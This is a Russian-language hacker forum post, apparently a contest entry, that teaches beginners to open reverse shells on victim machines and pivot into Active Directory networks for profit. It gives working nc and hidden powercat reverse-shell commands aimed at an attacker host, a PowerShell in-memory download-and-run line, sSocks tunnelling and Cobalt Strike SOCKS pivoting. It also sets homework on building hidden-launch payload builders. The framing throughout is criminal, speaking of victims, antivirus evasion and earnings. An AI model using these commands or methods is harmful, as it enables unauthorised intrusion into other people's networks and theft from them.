Носки всегда бери с собой

  • Автор темы Admin

Admin

#1
Администратор
Регистрация
31.12.2019
Сообщения
6,977
Реакции
34
Привет всем

В последнее время, я много занимаюсь с ребятами, по атакам на АД. Показываю стек технологий, которые нужно знать и разбираться. После освоения теории и получения базовой практики, ребята сами должны определиться в направлении, в котором они хотят продвигаться дальше и зарабатывать.
Решил одну из тем, которую мы изучаем, оформить и разместить для участия в конкурсе. Как и в обучении, постараюсь изложить материал последовательно. Материал полностью мой, авторский, поэтому Хейтеров прошу негатив писать только с ссылкой на их материал))))). Так же хочу пояснить, что именно такого материала и в таком изложении я не видел. И как в учебе, будет интересно и понятно все в самом конце, так уж образование устроено).
Тема, которую я хочу раскрыть, будет актуальна в основном для начинающих и среднего уровня ребятам. А для продвинутых, данный материал – будет как повторение или как напоминание )))).

И так, очень актуальной темой при работе с сетками – является организация разного рода соединений, коммуникации и доставки софта, в том числе и полезной нагрузки. Желательно ручками проделать это от самого начала и до конца, что б понимать на каком этапе идет сбой, почему не возвращается сессия (коннект). Весь инструментарий, который я даю в данной статье, можно самому изменить, подправить, так как он есть в открытом доступе.

И так приступим, общая тема – Носки всегда бери с собой ))):

  • Вступление (теория);
  • NC (Начало);
  • Socks (Продвинутый NC);
  • Cobalt Strike (профит) )));
  • Выводы;
  • Д.З.
Приступим.

0.
В нашем не легком деле, очень важно быстро организовать доступ, поднять сессию, залить инструмент, с которым мы будем работать в дальнейшем. Когда мы уже взрослые, понимаем что к чему, тогда мы обычно используем Лоадер для доставки. В этой статье мы попробуем пройти начало, попробуем разобраться как работать используя базовый софт, не прибегая к криптору и прочим спец средствам. Ведь часто бывает так, что и у бывалых появляется потребность в организации доступов, без специальных средств. И так теория –
Мы имеем удаленную машину(цель). И нам надо организовать коммуникацию с этой машиной - это во первых, а во вторых так же организовать коммуникацию с сетью жертвы (как пример Актив Директори) где находится эта машина. И так, нам нужно организовать клиент – серверное решение. В зависимости от того где находится цель, а именно это статический IP или за NAT, мы определимся кто у нас сервер, а кто клиент и наше соединение будет либо:

BIND, когда цель имеет статический IP ;
либо
REVERS, когда цель находится за NAT.

Далее, что нам нужно знать о клиент – серверном взаимодействии на начальном уровне, это то, что:
Серверная часть в зависимости от инструмента может называется – Сервер, Хандлер, Листенер.
А клиентская сторона – Клиент, Пейлоад, Полезная нагрузка, Стежер, Стежелист.

В зависимости от условий, мы сами принимает решение, что, как, почему и какой порт использовать в той или иной ситуации и так далее. Теперь мы рассмотрим эволюцию взаимодействия, от простого к более продвинутому уровню.

1.
NC, Powercat

Самые первые и базовые инструмента, которые должен начать использовать любой Атакующий, NC, Powercat. Легко доставляется, легко обходится АВ, дает нам доступ к cmd.exe к, методам доставки и реллею. В данном случае для взаимодействия с жертвой достаточно 2 машины, одна из которых должна иметь статический ИП.

Так вот в зависимости от того, какой ИП жертва имеет, мы принимаем решение какое соединение использовать. Главное понимать, что почти всегда используется REVERS и основная задача понять кто здесь клиент, а кто сервер. Далее рассмотрим наиболее необходимые команды для своей шпаргалки или назовем это методичкой, чеклистом.

NC:

В статье я рассматриваю NC для Windows платформы, хотя принципиально ничем не отличается от версии Unix. NC – утилита позволяющая устанавливать соединения TCP и UDP, принимать данные и передавать их. Главное что нам нужно понимать, что основных участника 2 – клиент и сервер. Сервер мы запускаем на WPS(на том, что имеет статический IP). Клиент запускаем на жертве. К VPS мы подключаемся через то т же RDP и работаем с командной строкой.
Думаю на описании утилиты нет смысла заострять внимание, переходим к практике.

Запуск nc для ожидания что к нам вернется командная строка запускаем на своем VPS( то есть на статическом IP).
- nc.exe -lp 80
Запуск nc для подключения и передачи командной строки. Запускаем на атакованной машине. (запускается на машине за NAT)
- nc.exe -e cmd 188.227.85.248 80

Ждем возврат CMD и работаем. Не забываем, подправить сам исполняемый файл - exe, если мы хотим запуститься в скрытом режиме, либо сделать bat, .vb, .js и прямо указать - запуск NC с в скрытном режиме. Более детальные возможности можно почерпнуть из документации разработчика.


Powercat:


Аналог NC – это Powercat, большого отличия мот предыдущего инструмента нет, но он нам тоже может быть даже очень интересным, поэтому так же быстро его рассмотрим. Powercat в отличии от предыдущего инструмента, является .ps1 скриптом, который легко модифицируется на лету, встраивается в другие скрипты, так же его можно совмещать при работе с тем же NC.
Принцип управления не отличается от предыдущего инструмента.
Запускаем Powercat для ожидания что к нам вернется командная строка. Запускаем на VPS и ждем сессию
Powershell.exe –ep bypass -nop -w hidden powercat -l -p 443

Запуск Powecat для подключения и передачи командной строки в срытом режиме. Запускаем с атакуемой машины.
Powershell.exe –ep bypass -nop -w hidden powercat -c 10.1.1.1 -p 443 -e cmd

Чем хорош именно этот инструмент, так это то, что мы можем его прямо без файлов загрузить в память, с того же GIT:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

И далее продолжаем работать как обычно. Вот самые простые способы и подручные методы для проброса сессии, которыми новички пользуются когда нет инструмента, а опытные, когда инструмент есть, а защита не дает ничего пробросить кроме самого простого)))))

Пример установления Revers сессии:

ffef62b22016e7bded010.jpg

bbe9ea7a6a72de9da8fa7.jpg

c9354f643c47e94ec1aef.jpg


Эти инструменты нам нужны были, для понимания следующего раздела


2.

И так, здесь посмотрим более продвинутые методы и способы проброса сессии – Socks

SOCKS – это интернет-протокол, который используется для передачи пакетов с данными от сервера к клиенту с помощью промежуточного прокси-сервера.
На сегодняшний день рабочие 2 технологии Socks:

Socks4 – технология клиент – серверного приложения которое не защищено доступом, и любой может им воспользоваться.
Socks5 - технология клиент – серверного приложения к которое как минимум для подключения нужены учетные данные.

В данном случае между атакующим и жертвой стоит то т же самый WPS. На Клиенте (нашей жертве) мы запускаем клиентский .exe где указываем IP нашего WPS с указанием порта для переноса, а на нашем WPS запускаем серверный exe, этим мы создали связь между нашим WPS и Жертвой. Теперь, через наш WPS, мы будем попадать в сеть.
А следующий шаг – самый интересный, с помощью отдельной клиентской .exe (На мой взгляд, наилучший клиент для Socks, на сегодняшний день является Proxifier.) мы указываем во первых наш WPS как шлюз, IP и порт внутренней цели. И самое главное, что это может быть как сама жертва, так и принтер в сети. ))))
Пробежим по классическому инструменту - sSocks :

Сначала выполните на локальном компьютере, обычно на вашем собственном vps:
rcsocks -l 1080 -p 53 -v

Выполнить на целевой машине, добавить -b для работы в фоновом режиме в реальной ситуации проникновения
rssocks -s vps:ip:53 -v
Затем настройте прокси с помощью различных локальных инструментов прокси-сервера socks, socks5 192.168.1.100 1080
И вот, мы уже не только сессии можем пробросить, мы уже пускаем наш трафик через другую машину, сеть. При этом работая на своей машине )))) Вот мы и рассмотрели один из самых простых и отличных Носков.
Выбор носков за вами, среди популярных остаются следующие носки:
- sSocks;
- EarthWorm
- netch;
- gost;
- fatedier;

Отдельно для себя как альтернативу, можно использовать такой сервис как Ngroc, в этой статье, я его описывать не буду, оставлю только ссылки. На этом мы пока закончим, и перейдем к основному, с чего и можно было начинать )))), а именно Socks Cobalt Strike и получения профита ))).

3.

И так, с теорией как это работает мы разобрались. Мы уже можем сами ручками и подручным инструментом пробрасывать свои сессии и трафик. Пришло время показать, как работают наши знания целого стэка технологий. И на примере Cobalt Strike, получать наш профит. Иными словами мы имеем наш VPS с Cobalt Strike, наша машина с которой мы работаем в панели Cobalt Strike, и сессия к жертве.
Запускаем носки Cobalt Strike, в качестве клиента на нашей машине используем Proxifier, настраиваем все это:

мой ип:

3772436b8100cdfd37812.jpg


настраиваем клиент носков:

7c5c20687a8ae58664980.jpg

4829328cbca9e4a5fcd43.jpg

81131407aad863e888383.jpg


вот мы и в Испании

0b2a04f47a5bd6de0c0a4.jpg


а вот мы взяли админа и лазим по сетке как у себя дома

a1f19a9d31a17c3e8cdb0.jpg

29a0b50928dbd2bce2be3.jpg

0beb6623510f3391c1ae4.jpg


Вот мы, уже и знаем как поднять сессию(вернуть ее), организовать проброс во внутреннюю сеть, и работать с чужой сетки. И так, зная все это, вы уже ХАКЕРЫ ))))) Как видите, нет ничего сложного, когда понимаешь, как это работает.

4.

А теперь в качестве последнего слова, будем подводить итог нашим знаниям. )))) В начале мы узнали как устроен и работает стек технологий, на примере Cobalt Strike я показал как весь трафик со своей машины перенаправить через захваченную машину.
Мы пополнили словарный запас используя целый стек технологий, кто только изучает тему ХАКинга, то вот следующий список для повторения который обязателен к пониманию для работы:
- Статический IP, NAT, WPS, RDP
- Сервер, Хандлер, Листенер;
- Клиент, Пейлоад, Полезная нагрузка, Стежер, Стежелист.
- NC, Powercat, Socks4, Socks5;
- Cobalt Strike )))
За последний год, я очень много работал с ребятами с Азии, и что я вам хочу сказать, что у всех абсолютно разные методы. Данный метод работы без лоадеров и крипторов в основном работают наши коллеги с Китая. Меняются только инструменты. )))) Ссылки на инструменты.
Приложения:
https://eternallybored.org/misc/netcat
ttps://github.com/besimorhino/powercat
Носки:
https://github.com/lparam/xSocks
htps://github.com/54Pany/sSocks
https://github.com/XHSecurity/EarthWorm
https://github.com/ginuerzh/gost
https://github.com/netchx/netch
https://github.com/fatedier
Сервисы:
https://ngrok.com/
https://www.ngrok.cc/

Настраиваем клиент носков

907286c302af4b0fc8484.jpg


a8c035b1caf4dc0d150ba.jpg

6494c8d1d905ebd2cd964.jpg


5.

В качестве практики, я своим ребятам даю задание по кодить, здесь не буду отходить от традиции и ради практики дам задание )
NC
-Сделать отдельно клиент и отдельно сервер;
-Сделать запуск клиента скрытым ;
- Написать билдер, который при получении IP и port выдавал NC-клиент, который двумя щелчками скрыто запускается.

Powercat
-Сделать отдельно клиент и отдельно сервер
- Сделать GUI сервера, с функциональностью прием сессии, загрузка выгрузка файла, работа с цмд;
- Сделать запуск клиента скрытым.
-Пересобрать в exe и dll.
Разбором этих заданий, займемся в слдущий раз).

И так ребят, на этом пока все.
Если тема зайдет и будет все понятно, а так же получит первое место, то можно будет разобрать все это в видео формате с рассмотрением сервисов с которыми можно работать и зарабатывать, в том числе и сервисом нашего СПОНСОРА
 

Members, viewing this thread

Сейчас на форуме нет ни одного пользователя.